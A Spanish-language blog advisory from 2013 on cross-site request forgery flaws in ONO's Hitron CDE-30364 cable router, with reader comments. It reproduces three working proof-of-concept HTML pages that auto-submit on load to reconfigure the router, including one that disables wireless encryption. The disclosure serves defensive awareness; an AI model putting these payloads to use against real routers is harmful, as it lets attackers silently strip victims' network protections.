lunes, 16 de septiembre de 2013

Múltiples CSRF en firmware de ONO para el router Hitron CDE-30364

Matias Mingorance Svensson ha descubierto múltiples problemas de seguridad en el firmware proporcionado por ONO para el router Hitron CDE-30364, que permitirían a un atacante remoto realizar ataques cross-Site Request Rorgery (CSRF) y modificar la configuración del dispositivo.

El Hitron CDE-30364 es un cable-modem-router inalámbrico proporcionado por ONO a sus clientes con conexiones de 30, 50 y 100 megas.

CSRF es una técnica que permite realizar peticiones HTTP a usuarios no autorizados a través del aprovechamiento de algún error en la validación de estas peticiones, o incluso la falta de dicha validación. Para explotar estas vulnerabilidades, el atacante debe engañar a la víctima que ha iniciado sesión en el dispositivo para que visite una página web especialmente manipulada desde la que se realizará la petición HTTP no autorizada y sin conocimiento del usuario legítimo.

Matias Mingorance Svensson ha descubierto múltiples vulnerabilidades CSRF en la interfaz de administración de los dispositivos Hitron CDE-30364 que la empresa de telecomunicaciones ONO entrega a sus clientes. Para documentarlas ha publicado varias pruebas de concepto que permitirían realizar modificaciones en la configuración del router. Son las siguientes:
  
  • Activar el bloqueo de sitios web y agregar un filtro (en este ejemplo la palabra 'google'): 
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre
ss5=0&trustedMAC=&keyword0=google">
</body>
</html>
  • Activar el sistema de detección de intrusiones (IDS): 
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1">
</body>
</html>
  • Dehabilitar el modo de seguridad Wireless (Wireless Security Mode): 
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Wls?dir=admin
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&
Encrypt_type=0">
</body>
</html>
Estas vulnerabilidades han sido comprobadas en dispositivos con firmware 3.1.0.8-ONO, aunque otras versiones también podrían verse comprometidas.

Más información:

Router ONO Hitron CDE-30364 - CSRF Vulnerability

ONO > Hitron CDE-30364



Juan José Ruiz

6 comentarios:

  1. Gracias por la publicación/divulgación Juan José!

    El router tiene bastantes más problemas de seguridad sobre CSRF, lo que quizá publiqué los más interesantes.

    Sobre el tema de la versión del firmware, cómo curiosidad, hasta la versión 3.0 el router no soportaba 100mb's. Con la 3.1 creo que soporta hasta 120mb's.

    Encontré otra manera de tumbar el router, y que sólo se puede solucionar llamando al servicio técnico. Es una tontería y quizá por eso no me lo han publicado. Si quieres por correo te lo puedo comentar Juan José, y quizá se pueda publicar en vuestra comunidad.

    Un saludo,
    Matías Mingorance Svensson

    ResponderEliminar
  2. Muchas gracias por el aviso.
    ¿Se sabe ya si existen actualizaciones del firmware previstas por parte de Ono, o quizá opción de sustituirlo por alguno original de la casa que solucione estos problemas de seguridad? Gracias de nuevo.

    ResponderEliminar
  3. Veo que estas vulnerabilidades atacan únicamente el puerto 80 del router. Supongo que si lo tienes cerrado (que es lo normal y la configuración por defecto) entonces no te ves afectado por estas vulnerabilidades ¿no?

    Gracias.

    ResponderEliminar
  4. Ya comprendo, el puerto 80 desde fuera está cerrado, pero desde dentro está abierto, y el exploit es que te hagan acceder a alguna página que ejecutará un javascript que accedera al puerto 80 pero desde la red local, no desde fuera.

    Ok, pues entonces estamos todos con el culo al aire si accedemos a esa página "maligna" (cualquiera porno por ejemplo).

    Como medida de prevención, yo por lo menos voy a poner mi ip local del router en un rango raro que no sea el típico 192.168.1.1.

    ResponderEliminar
  5. Anónimo1, no conozco ninguna previsión de si van a actualizar para solucionarlo, y desconozco si los demás router que tienen, porque tienen diferentes marcas, vienen con estos problemas solucionados.

    Anónimo3, tanto porno ves? jajaja es broma! El cambio de IP...bueno...no está mal si hacen copy&paste de mis exploits, es decir con la IP 192.168.1.1 escrita a mano, pero ten en cuenta que el javascript se ejecuta en tu ordenador, así que se podría hacer algo tipo http://%variable_de_ip_gateway%/... por ejemplo, con lo que por mucho que la cambies...lo entiendes?

    ResponderEliminar
  6. Os comento el caso porque yo tengo este router y me ha pasado lo siguiente: en agosto me fui de vacaciones y como es lo más valioso que tengo en casa lo dejé en casa de mi madre, es decir que estuvo apagado todo agosto y nadie lo toco. Pues bien cuando llego miro el historial por casualidad y aparecen entradas durante todo el mes de una página VK especie de facebook ruso o similar y también algunas entradas de páginas porno. Lo llevo a una tienda de informática y me dicen que tienen que haber usado el ordenador, le pasan antivirus no ven nada y me lo llevo. Al llegar a casa miro otra vez el historial y aparecen entradas los días que paso en la tienda de informática. Se lo llevo a la tienda otra vez y no sabe de que puede ser. En esto que se actualiza el google chrome y aparecen en el historial de mi portatil el otro ordenador que tengo en casa y otro PC-EQUIPO que no se de dónde sale y también aparecen entradas a estas páginas en el otro pc que tengo. Consulto en CHROME y me dicen que como en los dos ordenadores tengo iniciada la sesión con mi cuenta puede que sea que me hayan cogido la clave que cambie la clave gmail y desincronice el chrome, cosa que hago, ahora en el historial de ninguno de los dos ordenadores aparece nada raro, en uno está iniciada sesión con una cuenta goolge y en otro con otra, pero sigo sin saber que pasó. Ahora lo que me extraña es el parpadeo de la señal wifi del router, le paso el sof perfec wifi guard y me salen dos del equipo en una pone intel y en la otra dell y otra del el router que pone hilton, es lo normal y la última cuestión es normal que parpadee cuando todo está apagado, móviles, tablet y portátiles??? Gracias.

    ResponderEliminar